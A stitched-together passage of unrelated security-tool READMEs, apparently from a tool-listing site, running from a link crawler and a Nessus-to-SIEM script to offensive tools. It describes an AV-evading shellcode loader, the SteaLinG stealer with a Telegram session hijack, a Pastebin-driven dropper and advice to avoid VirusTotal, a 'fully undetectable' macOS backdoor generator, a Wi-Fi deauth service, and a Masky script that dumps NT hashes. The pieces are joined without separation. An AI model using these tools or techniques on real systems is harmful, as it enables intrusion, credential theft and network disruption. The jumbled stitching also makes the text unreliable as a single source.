http://www.target.com
https://target-payments.com
https://static.target-cdn.com
If a link is found that has no domain, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
Always provide the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly, if Depth (-d) is >1 then out-of-scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
target.*
target-payments.com
static.target-cdn.com
When providing a regex value with -ra, it's always a good idea to use https://regex101.com/ to check your regex expression is going to do what you expect.
Use the -v option to have a better idea of what the tool is doing.
If you have any problems, use the -vv option, which may show errors that are occurring; these can possibly be resolved, or you can raise them as an issue on GitHub.
Pass cookie (-c), header (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
Use the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
Use the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
When using a high level of Depth (-d), be wary of some sites using dynamic links, as it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the Stop flags (-s429, -s403, -sTO, -sCE) should also be considered.
If you are finding a large number of links (especially if the -d value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
When selecting a User Agent, the default is desktop. If you have a target that could have different links for different User Agent groups, then specify -u desktop mobile for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
When the input (-i) has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use the -v or -vv options) then consider using -t to raise the timeout limit.
If you know a site's responses are likely to contain binary data, consider using -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.
If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on GitHub. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.
Active link finding for a domain:
Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom). For instance, in msfvenom, you can do it like so (the payload I'm using is for illustration purposes; you can use whatever payload you want):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
Copy the C-style array in the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}.
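The two helper scripts above can be approximated in a few lines of Python. This is an illustrative sketch, not the repository's actual code; the NOP padding of the final block and the single-byte XOR key are assumptions. bytes_le is used because UuidFromStringA writes the first three UUID fields back to memory in little-endian order.

```python
import uuid

def bin_to_uuids(shellcode):
    """Convert raw shellcode to UUID strings, 16 bytes per UUID; the final
    block is padded with NOPs (0x90), which is an assumption made here."""
    if len(shellcode) % 16:
        shellcode += b"\x90" * (16 - len(shellcode) % 16)
    return [str(uuid.UUID(bytes_le=shellcode[i:i + 16]))
            for i in range(0, len(shellcode), 16)]

def xor_crypt(data, key=0x10):
    """Single-byte XOR, its own inverse; the real script's KEY may differ."""
    return bytes(b ^ key for b in data)
```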
This shellcode injection technique comprises the following steps:
1. Allocates a block of memory with VirtualAlloc.
2. XOR-decrypts the payload using the xor key value.
3. Uses UuidFromStringA to convert the UUID strings into their binary representation and store them in the previously allocated memory. This avoids the usage of suspicious APIs like WriteProcessMemory or memcpy.
4. Uses EnumChildWindows to execute the payload previously loaded into memory.
Instead of using memcpy or WriteProcessMemory, which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA, which can be used to decode data as well as write it to memory (Isn't that great, folks? And please don't say "NO!" :) ).
You can change the xor key (row 86) to whatever you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
You can change the executable filename value (row 90) to your filename.
For compiling, mingw was used, but you can use whichever compiler you prefer. :)
make
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.
This is for testing purposes only and may be used only where strict consent has been given. Do not use it for illegal purposes.
module | Short description |
---|---|
Dump password | Steals all saved passwords and uploads the file of saved passwords to Mega |
Dump History | Dumps browser history |
Dump files | Steals files from the hard drive with the extension you want |
module | Short description |
---|---|
1- Telegram Session Hijack | Telegram session hijacker |
How does it work? Telegram Desktop stores its session data in C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the tdata folder:
C:
└── Users
    ├── AppData
    │   └── Roaming
    │       └── Telegram Desktop
    │           └── tdata
Once you copy this folder with all its contents to the same path on another device, the session is hijacked; it is that simple. The tool does all of this; all you have to do is give it your token from https://anonfiles.com/.
First, the tool goes to the path where the tdata folder is located and compresses it into a zip file. This would fail if Telegram were running; if an error occurs, meaning Telegram is open, the tool kills the Telegram process. Antivirus software would flag that as malicious behavior, so this part is avoided where possible with a try/except in the code. The victim's device name is used in the archive filename, in case you have more than one victim. The zip file is then uploaded to anonfiles with a POST request using the API key (token) of your account on the site; you will find your token there. That's it, and it is not detected by any AV.
module |
---|
2- Dropper |
The dropper module asks for the URL of the virus, or whatever you want to download to the victim's device. Keep in mind that the URL must be direct, meaning it must end with the file itself, e.g. .exe or .png; what matters is that the link ends with the file extension. It also asks for your Pastebin API key and your username and password; if you register on Pastebin and click on "API", you will find the key. So how does it work?
First, it creates a private paste on Pastebin and adds the URL you gave it; then it gives you the exe file. When the exe runs on any device, it adds itself to the device registry in two different ways, opens the private paste you created, takes the URL from it, downloads its content, and runs it. You can change the URL in the paste at any time; the dropper checks the URL every 10 minutes, and if it has changed, it downloads and runs the new content without you doing anything. So, every 10 minutes, you can literally access your victim's device from anywhere.
3- Linux support
4-You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't upload it to VirusTotal.com, because this tool will not stay undetected over time if you do.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!
Today, with the spread of information technology systems, investments in cyber security have increased considerably. Vulnerability management, penetration tests, and various analyses are carried out to determine accurately how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader among vulnerability management tools, a newly joined IP address on the corporate network, a newly opened port, and exploitable vulnerabilities can be identified; this Python application was developed to work integrated with Tenable Nessus and identify these changes automatically.
git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt
The SIEM IP address in the codes should be changed.
To detect a new IP address reliably, the script checks whether the phrase "Host Discovery" appears in the Nessus scan name; live IP addresses are recorded in the database with a timestamp, and any new (difference) IP address is sent to the SIEM. The contents of the hosts table were as follows:
Usage: python finding-new-ip-nessus.py
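Conceptually, the detection is a set difference between the live hosts from the latest "Host Discovery" scan and those already stored, with each new address forwarded to the SIEM. The sketch below illustrates that flow under stated assumptions (syslog over UDP and the message format are guesses, and the function names are ours, not the actual script's):

```python
import socket

SIEM_IP = "192.168.1.1"  # placeholder; set this to your SIEM address
SIEM_PORT = 514          # assumption: the SIEM listens for syslog over UDP

def diff_new_ips(known_ips, scanned_ips):
    # IPs seen in the latest Host Discovery scan but not yet in the database
    return sorted(set(scanned_ips) - set(known_ips))

def notify_siem(ip, timestamp):
    # Forward one "new IP" event to the SIEM
    msg = f"New IP: {ip} {timestamp}"
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(msg.encode(), (SIEM_IP, SIEM_PORT))
```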
By checking the port scans made by Nessus, port/IP/timestamp information is recorded in the database; a newly opened service is detected via the database, and the data is transmitted to the SIEM in the form "New Port:" port-IP-timestamp. The result observed by the SIEM is as follows:
Usage: python finding-new-port-nessus.py
Among the findings of vulnerability scans in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database and transmits this information to the SIEM whenever it finds a new exploitable vulnerability on the systems. Exploitable vulnerabilities observed by the SIEM:
Usage: python finding-exploitable-service-nessus.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.
Here, wardriving is performed by combining the SSID information obtained with Scapy with location data obtained via the HTML5 geolocation feature.
I cannot be held responsible for malicious use of this tool.
ssidBul.py has been tested via TP-LINK TL WN722N.
Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.
SSID and MAC names and location information were created and changed in the test environment.
ssidBul.py and location.py must be run concurrently.
ssidBul.py result:
20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
Here is a screenshot of allowing location information while running location.py:
The screenshot of the location information is as follows:
konum.py result:
lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
After the data collection processes, the following output is obtained as a result of running wardriving.py:
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
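The merge performed by wardriving.py can be understood as a join of the two logs on their shared timestamp field; the sketch below is a hypothetical reimplementation of that join, not the actual script:

```python
def join_logs(ssid_lines, location_lines):
    # Index location rows by their timestamp (third |-separated field)
    locations = {}
    for line in location_lines:
        lat, lon, ts = line.strip().split("|")
        locations[ts] = (lat, lon)
    # Prepend the matching coordinates to each SSID row
    merged = []
    for line in ssid_lines:
        ts, mac, ssid = line.strip().split("|")
        if ts in locations:
            lat, lon = locations[ts]
            merged.append(f"{lat}|{lon}|{ts}|{mac}|{ssid}")
    return merged
```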
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Unofficial Flipper Zero CLI wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFC000FFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFC000FFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
OSripper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least), so for now I will not focus on Windows.
You can also PM me on discord for support or to ask for new features SubGlitch1#2983
Please check the wiki for information on how OSRipper functions (which changes extremely frequently)
https://github.com/SubGlitch1/OSRipper/wiki
Here are example backdoors which were generated with OSRipper
macOS .apps will look like this on vt
You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.
Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.
apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3
Only this
sudo python3 main.py
Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.
Coming soon
Just open an issue and I'll make sure to get back to you.
0.2.1
0.1.6
0.1.5
0.1.4
0.1.3
0.1.2
0.1.1
MIT
Inspiration, code snippets, etc.
I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work, I would really be happy about any donation. You do NOT have to; this is solely optional.
BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.
I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.
Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm
└─# python3 aced.py -h
_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0
Parse and log a target principal's DACL.
@garrfoster
usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target
Tool to enumerate a single target's DACL in Active Directory
optional arguments:
-h, --help show this help message and exit
Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS instead of LDAP
Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.
In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
And here's how that data looks when transformed by bofhound and ingested into BloodHound.
A tool built to automatically deauth local networks
$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed
use sudo autodeauth or systemctl start autodeauth
to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service
$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|
usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]
Auto Deauth Tool
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of network ssids/mac addresses to avoid (Comma separated)
--whitelist WHITELIST, -w WHITELIST
List of network ssids/mac addresses to target (Comma separated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)
After running the setup you are able to run the script by using autodeauth from any directory
Networks with spaces can be represented using their mac addresses
$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000
$ sudo systemctl start autodeauth
When a network is detected and fits the whitelist/blacklist criteria, its network information is saved as a JSON file in /var/log/autodeauth/
{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}
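Since every matched network is written out as JSON, the captures are easy to post-process; a small sketch (the helper names are ours; the file layout follows the README):

```python
import json
from pathlib import Path

def load_networks(log_dir="/var/log/autodeauth"):
    # Parse every saved network capture into a list of dicts
    return [json.loads(p.read_text()) for p in Path(log_dir).glob("*.json")]

def strongest(networks):
    # Signal strength is in dBm, so the least negative value is strongest
    return max(networks, key=lambda n: n["signal"], default=None)
```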
$ cat /var/log/autodeauth/log
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up
To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Let's say you wanted the following config to be set up as a service:
$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service
Then you would change the ExecStart line to
ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.
This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos & NT hash retrieval via PKINIT). A blog post was published detailing the implemented techniques and how Masky works.
Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for their research regarding offensive exploitation techniques against ADCS (see the Acknowledgments section).
The Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as follows:
pip install masky
The Masky agent executable is already included within the PyPi package.
Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to be built.
Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.
For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.
Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.
The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution collects NT hashes, CCACHE and PFX files of 3 distinct domain users from the sec.lab testing domain.
Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).
__ __ _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/
usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]
positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not
options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)
Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)
Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.
from masky import Masky
from getpass import getpass
def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()
# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)
# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)
# Check if Masky successfully hijacked at least one user session
# or if an unexpected error occurred
if not rslts:
return False
# Loop over the MaskyResult object to display hijacked users and retrieve their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes()
Its execution generates the following output.
$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults object containing a list of User objects is returned after a successful execution of Masky. Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.
Erlik - Vulnerable Soap Service
Tested - Kali 2022.1
It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.
It contains the following vulnerabilities.
git clone https://github.com/anil-yelken/Vulnerable-Soap-Service
cd Vulnerable-Soap-Service
sudo pip3 install -r requirements.txt
sudo python3 vulnerable_soap.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py
Code:
https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py
https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py
This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.
If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.
